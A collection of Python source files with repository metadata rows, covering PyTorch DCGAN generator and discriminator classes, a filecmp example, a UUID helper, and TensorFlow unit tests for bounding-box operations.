[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** (i+1), (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.transitions_norm = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (i + 1), height // (2 ** i), length // (2 ** i)]) for i in
range(blocks)])
self.transitions_activ = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (i + 1)) for i in range(blocks)])
self.final_linear = nn.Linear(hidden_size * 2 ** blocks, 1)
def forward(self, inputs):
x = self.initial_conv(inputs)
x = self.initial_activ(x)
x = self.initial_norm(x)
for i in range(self.blocks):
fx = self.convs1[i](x)
fx = self.activ1[i](fx)
fx = self.norm1[i](fx)
fx = self.convs2[i](fx)
fx = self.activ2[i](fx)
fx = self.norm2[i](fx)
x = x + fx
fx = self.convs3[i](x)
fx = self.activ3[i](fx)
fx = self.norm3[i](fx)
fx = self.convs4[i](fx)
fx = self.activ4[i](fx)
fx = self.norm4[i](fx)
x = x + fx
x = self.transitions_conv[i](x)
x = self.transitions_activ[i](x)
x = self.transitions_norm[i](x)
x = F.avg_pool2d(x, kernel_size=(2, 2))
x = F.avg_pool2d(x, kernel_size=(x.shape[-2], x.shape[-1]))
x = x.view(x.shape[0], -1)
x = self.final_linear(x)
return x
class DCGANGenerator(nn.Module):
def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):
super(DCGANGenerator, self).__init__()
self.hidden_size = hidden_size
self.blocks = blocks
self.height = height
self.length = length
self.mult = 2**blocks
self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)
self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)
self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)
self.convs = nn.ModuleList([nn.Conv2d(hidden_size * 2 **(blocks - i), hidden_size * 2**(blocks - i - 1), (5, 5), padding=(2, 2)) for i in range(blocks)])
self.activ = nn.ModuleList([nn.PReLU(hidden_size * 2**(blocks - i - 1)) for i in range(blocks)])
self.norm = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))
self.final_activ = nn.Tanh()
def forward(self, inputs):
x = self.initial_linear(inputs)
x = self.initial_activ(x)
x = self.initial_norm(x)
x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)
for i in range(self.blocks):
x = self.convs[i](x)
x = self.activ[i](x)
x = self.norm[i](x)
x = F.upsample(x, scale_factor=2)
x = self.final_conv(x)
x = self.final_activ(x)
return x
class DCGANDiscriminator(nn.Module):
def __init__(self, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):
super(DCGANDiscriminator, self).__init__()
self.hidden_size = hidden_size
self.blocks = blocks
self.initial_conv = nn.Conv2d(image_channels, hidden_size, (5, 5), padding=(2, 2))
self.initial_norm = nn.LayerNorm([hidden_size, height, length])
self.initial_activ = nn.PReLU(hidden_size)
self.convs = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** (i + 1), (5, 5), padding=(2, 2)) for
i in range(blocks)])
self.norm = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (i + 1), height // (2 ** i), length // (2 ** i)]) for i
in range(blocks)])
self.activ = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (i + 1)) for i in range(blocks)])
self.final_linear = nn.Linear(hidden_size * 2 ** blocks * height//(2**blocks) * length//(2**blocks), 1)
def forward(self, inputs):
x = self.initial_conv(inputs)
x = self.initial_norm(x)
x = self.initial_activ(x)
for i in range(self.blocks):
x = self.convs[i](x)
x = self.norm[i](x)
x = self.activ[i](x)
x = F.avg_pool2d(x, kernel_size=(2, 2))
x = x.view(x.shape[0], -1)
x = self.final_linear(x)
return x
| 44.185328 | 161 | 0.543254 | 1,584 | 11,444 | 3.8125 | 0.048611 | 0.12916 | 0.091075 | 0.07286 | 0.96208 | 0.95943 | 0.956615 | 0.952972 | 0.948336 | 0.944693 | 0 | 0.033462 | 0.297536 | 11,444 | 258 | 162 | 44.356589 | 0.717751 | 0 | 0 | 0.835749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038647 | false | 0 | 0.009662 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
39a9d83765bc474065272e524eab67f64472854e | 844 | py | Python | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | 3 | 2018-08-14T09:33:52.000Z | 2022-03-21T12:31:58.000Z | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | import filecmp
print('common_file :', end=' ')
print(filecmp.cmp('example/dir1/common_file',
'example/dir2/common_file'),
end=' ')
print(filecmp.cmp('example/dir1/common_file',
'example/dir2/common_file',
shallow=False))
print('not_the_same:', end=' ')
print(filecmp.cmp('example/dir1/not_the_same',
'example/dir2/not_the_same'),
end=' ')
print(filecmp.cmp('example/dir1/not_the_same',
'example/dir2/not_the_same',
shallow=False))
print('identical :', end=' ')
print(filecmp.cmp('example/dir1/file_only_in_dir1',
'example/dir1/file_only_in_dir1'),
end=' ')
print(filecmp.cmp('example/dir1/file_only_in_dir1',
'example/dir1/file_only_in_dir1',
shallow=False))
| 32.461538 | 52 | 0.587678 | 101 | 844 | 4.643564 | 0.178218 | 0.187633 | 0.191898 | 0.230277 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0 | 0.0256 | 0.259479 | 844 | 25 | 53 | 33.76 | 0.7248 | 0 | 0 | 0.545455 | 0 | 0 | 0.427725 | 0.374408 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.045455 | 0 | 0.045455 | 0.409091 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
84603189868768c4b0989f6da988b2155e69eb51 | 159 | py | Python | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from shortuuid import uuid
def generate_uuid():
"""
Generate uuid that is used for experiments and modules
"""
return uuid()
| 14.454545 | 58 | 0.660377 | 21 | 159 | 4.952381 | 0.809524 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 0.251572 | 159 | 10 | 59 | 15.9 | 0.865546 | 0.427673 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
083abbbb06fcf30057e5bbc8a9ab46f3255cace4 | 36,769 | py | Python | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | 1 | 2020-09-28T13:07:19.000Z | 2020-09-28T13:07:19.000Z | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | null | null | null | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | 1 | 2020-09-28T13:07:23.000Z | 2020-09-28T13:07:23.000Z | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for box_ops.py."""
# Import libraries
import numpy as np
import tensorflow as tf
from official.vision.beta.ops import box_ops
def _transform_boxes_on_tpu_and_cpu(transform_fn, boxes, *args):
# Runs on TPU.
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
transformed_op_tpu = transform_fn(boxes, *args)
transfomred_boxes_tpu = tf.nest.map_structure(lambda x: x.numpy(),
transformed_op_tpu)
# Runs on CPU.
transfomred_op_cpu = transform_fn(boxes, *args)
transfomred_boxes_cpu = tf.nest.map_structure(lambda x: x.numpy(),
transfomred_op_cpu)
return transfomred_boxes_tpu, transfomred_boxes_cpu
class ConvertBoxesTest(tf.test.TestCase):
def testConvertBoxes(self):
# y1, x1, y2, x2.
boxes = np.array([[0, 0, 1, 2], [0.2, 0.1, 1.2, 1.1]])
# x1, y1, width, height
target = np.array([[0, 0, 2, 1], [0.1, 0.2, 1, 1]])
outboxes = box_ops.yxyx_to_xywh(boxes)
self.assertNDArrayNear(outboxes, target, 1e-7)
class JitterBoxesTest(tf.test.TestCase):
def testJitterBoxes(self):
boxes_data = [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]]
boxes_np = np.array(boxes_data, dtype=np.float32)
max_size = max(
np.amax(boxes_np[:, 3] - boxes_np[:, 1]),
np.amax(boxes_np[:, 2] - boxes_np[:, 0]))
noise_scale = 0.025
boxes = tf.constant(boxes_np)
def jitter_fn(input_boxes, arg_noise_scale):
return box_ops.jitter_boxes(input_boxes, arg_noise_scale)
jittered_boxes_tpu, jittered_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
jitter_fn, boxes, noise_scale)
# Test that the jittered box is within 10 stds from the inputs.
self.assertNDArrayNear(jittered_boxes_tpu, boxes_np,
noise_scale * max_size * 10)
self.assertNDArrayNear(jittered_boxes_cpu, boxes_np,
noise_scale * max_size * 10)
class NormalizeBoxesTest(tf.test.TestCase):
def testNormalizeBoxes1DWithImageShapeAsList(self):
boxes = tf.constant([10, 30, 40, 90], tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu, [0.2, 0.3, 0.8, 0.9], 1e-5)
def testNormalizeBoxes1DWithImageShapeAsTensor(self):
boxes = tf.constant([10, 30, 40, 90], tf.float32)
image_shape = tf.constant([50, 100], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu, [0.2, 0.3, 0.8, 0.9], 1e-5)
def testNormalizeBoxes2DWithImageShapeAsList(self):
boxes = tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], 1e-5)
def testNormalizeBoxes2DWithImageShapeAsVector(self):
boxes = tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32)
image_shape = tf.constant([50, 100], dtype=tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], 1e-5)
def testNormalizeBoxes2DWithImageShapeAsBroadcastableTensor(self):
boxes = tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32)
image_shape = tf.constant([[50, 100]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], 1e-5)
def testNormalizeBoxes2DWithImageShapeAsSameShapeTensor(self):
boxes = tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32)
image_shape = tf.constant([[50, 100], [50, 100]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], 1e-5)
def testNormalizeBoxes3DWithImageShapeAsList(self):
boxes = tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]], 1e-5)
def testNormalizeBoxes3DWithImageShapeAsVector(self):
boxes = tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32)
image_shape = tf.constant([50, 100], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]], 1e-5)
def testNormalizeBoxes3DWithImageShapeAsBroadcastableTensor(self):
boxes = tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32)
image_shape = tf.constant([[[50, 100]], [[500, 1000]]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(
normalized_boxes_tpu,
[[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]], 1e-5)
def testNormalizeBoxes3DWithImageShapeAsSameShapeTensor(self):
boxes = tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32)
image_shape = tf.constant(
[[[50, 100], [50, 100]], [[500, 1000], [500, 1000]]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.normalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(
normalized_boxes_tpu,
[[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]], 1e-5)
class DenormalizeBoxesTest(tf.test.TestCase):
def testDenormalizeBoxes1DWithImageShapeAsList(self):
boxes = tf.constant([0.2, 0.3, 0.8, 0.9], tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu, [10, 30, 40, 90], 1e-5)
def testDenormalizeBoxes1DWithImageShapeAsTensor(self):
boxes = tf.constant([0.2, 0.3, 0.8, 0.9], tf.float32)
image_shape = tf.constant([50, 100], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu, [10, 30, 40, 90], 1e-5)
def testDenormalizeBoxes2DWithImageShapeAsList(self):
boxes = tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[10, 30, 40, 90], [30, 10, 40, 50]], 1e-5)
def testDenormalizeBoxes2DWithImageShapeAsVector(self):
boxes = tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
tf.float32)
image_shape = tf.constant([50, 100], dtype=tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[10, 30, 40, 90], [30, 10, 40, 50]], 1e-5)
def testDenormalizeBoxes2DWithImageShapeAsBroadcastableTensor(self):
boxes = tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
tf.float32)
image_shape = tf.constant([[50, 100]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[10, 30, 40, 90], [30, 10, 40, 50]], 1e-5)
def testDenormalizeBoxes2DWithImageShapeAsSameShapeTensor(self):
boxes = tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
tf.float32)
image_shape = tf.constant([[50, 100], [50, 100]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[10, 30, 40, 90], [30, 10, 40, 50]], 1e-5)
def testDenormalizeBoxes3DWithImageShapeAsList(self):
boxes = tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]],
tf.float32)
image_shape = [50, 100]
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], 1e-5)
def testDenormalizeBoxes3DWithImageShapeAsVector(self):
boxes = tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]],
tf.float32)
image_shape = tf.constant([50, 100], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], 1e-5)
def testDenormalizeBoxes3DWithImageShapeAsBroadcastableTensor(self):
boxes = tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]],
tf.float32)
image_shape = tf.constant([[[50, 100]], [[500, 1000]]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], 1e-5)
def testDenormalizeBoxes3DWithImageShapeAsSameShapeTensor(self):
boxes = tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
[[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]],
tf.float32)
image_shape = tf.constant(
[[[50, 100], [50, 100]], [[500, 1000], [500, 1000]]], tf.int32)
normalized_boxes_tpu, normalized_boxes_cpu = (
_transform_boxes_on_tpu_and_cpu(
box_ops.denormalize_boxes, boxes, image_shape))
self.assertNDArrayNear(normalized_boxes_tpu, normalized_boxes_cpu, 1e-5)
self.assertNDArrayNear(normalized_boxes_tpu,
[[[10, 30, 40, 90], [30, 10, 40, 50]],
[[20, 40, 50, 80], [30, 50, 40, 90]]], 1e-5)
class ClipBoxesTest(tf.test.TestCase):
def testClipBoxesImageShapeAsList(self):
boxes_data = [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]]
image_shape = [3, 3]
boxes = tf.constant(boxes_data)
clipped_boxes_tpu, clipped_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
box_ops.clip_boxes, boxes, image_shape)
self.assertAllClose(clipped_boxes_tpu, clipped_boxes_cpu)
self.assertAllClose(clipped_boxes_tpu,
[[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]])
def testClipBoxesImageShapeAsVector(self):
boxes_data = [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]]
boxes = tf.constant(boxes_data)
image_shape = np.array([3, 3], dtype=np.float32)
clipped_boxes_tpu, clipped_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
box_ops.clip_boxes, boxes, image_shape)
self.assertAllClose(clipped_boxes_tpu, clipped_boxes_cpu)
self.assertAllClose(clipped_boxes_tpu,
[[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]])
def testClipBoxesImageShapeAsTensor(self):
boxes_data = [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]]
boxes = tf.constant(boxes_data)
image_shape = tf.constant([[3, 3], [3, 3], [3, 3], [3, 3], [3, 3], [3, 3]],
dtype=tf.float32)
clipped_boxes_tpu, clipped_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
box_ops.clip_boxes, boxes, image_shape)
self.assertAllClose(clipped_boxes_tpu, clipped_boxes_cpu)
self.assertAllClose(clipped_boxes_tpu,
[[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
[0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]])
class EncodeDecodeBoxesTest(tf.test.TestCase):
def test_encode_decode_boxes(self):
boxes_np = np.array([[[1.0, 2.0, 3.0, 4.0], [2.0, 3.0, 4.0, 5.0]],
[[4.0, 5.0, 6.0, 7.0], [5.0, 6.0, 7.0, 8.0]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
anchors = tf.constant([[[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]],
[[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]]],
dtype=tf.float32)
weights = [1.0, 1.0, 1.0, 1.0]
def test_fn(boxes, anchors):
encoded_boxes = box_ops.encode_boxes(boxes, anchors, weights)
decoded_boxes = box_ops.decode_boxes(encoded_boxes, anchors, weights)
return decoded_boxes
decoded_boxes_tpu, decoded_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
test_fn, boxes, anchors)
self.assertNDArrayNear(decoded_boxes_tpu, decoded_boxes_cpu, 1e-5)
self.assertNDArrayNear(decoded_boxes_tpu, boxes_np, 1e-5)
def test_encode_decode_boxes_batch_broadcast(self):
boxes_np = np.array([[[1.0, 2.0, 3.0, 4.0], [2.0, 3.0, 4.0, 5.0]],
[[4.0, 5.0, 6.0, 7.0], [5.0, 6.0, 7.0, 8.0]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
anchors = tf.constant([[[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]]],
dtype=tf.float32)
weights = [1.0, 1.0, 1.0, 1.0]
def test_fn(boxes, anchors):
encoded_boxes = box_ops.encode_boxes(boxes, anchors, weights)
decoded_boxes = box_ops.decode_boxes(encoded_boxes, anchors, weights)
return decoded_boxes
decoded_boxes_tpu, decoded_boxes_cpu = _transform_boxes_on_tpu_and_cpu(
test_fn, boxes, anchors)
self.assertNDArrayNear(decoded_boxes_tpu, decoded_boxes_cpu, 1e-5)
self.assertNDArrayNear(decoded_boxes_tpu, boxes_np, 1e-5)
class FilterBoxesTest(tf.test.TestCase):
def test_filter_boxes_batch(self):
# boxes -> [[small, good, outside], [outside, small, good]]
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
[4.0, 1.0, 7.0, 4.0]]])
filtered_boxes_np = np.array([[[0.0, 0.0, 0.0, 0.0], [2.0, 3.0, 4.5, 5.5],
[0.0, 0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0],
[4.0, 1.0, 7.0, 4.0]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
scores_np = np.array([[0.9, 0.7, 0.5], [0.11, 0.22, 0.33]])
filtered_scores_np = np.array([[0.0, 0.7, 0.0], [0.0, 0.0, 0.33]])
scores = tf.constant(scores_np, dtype=tf.float32)
image_shape = tf.expand_dims(
tf.constant([[8, 8], [8, 8]], dtype=tf.int32), axis=1)
min_size_threshold = 2.0
def test_fn(boxes, scores, image_shape):
filtered_boxes, filtered_scores = box_ops.filter_boxes(
boxes, scores, image_shape, min_size_threshold)
return filtered_boxes, filtered_scores
filtered_results_tpu, filtered_results_cpu = (
_transform_boxes_on_tpu_and_cpu(
test_fn, boxes, scores, image_shape))
filtered_boxes_tpu, filtered_scores_tpu = filtered_results_tpu
filtered_boxes_cpu, filtered_scores_cpu = filtered_results_cpu
self.assertNDArrayNear(filtered_boxes_tpu, filtered_boxes_cpu, 1e-5)
self.assertNDArrayNear(filtered_scores_tpu, filtered_scores_cpu, 1e-5)
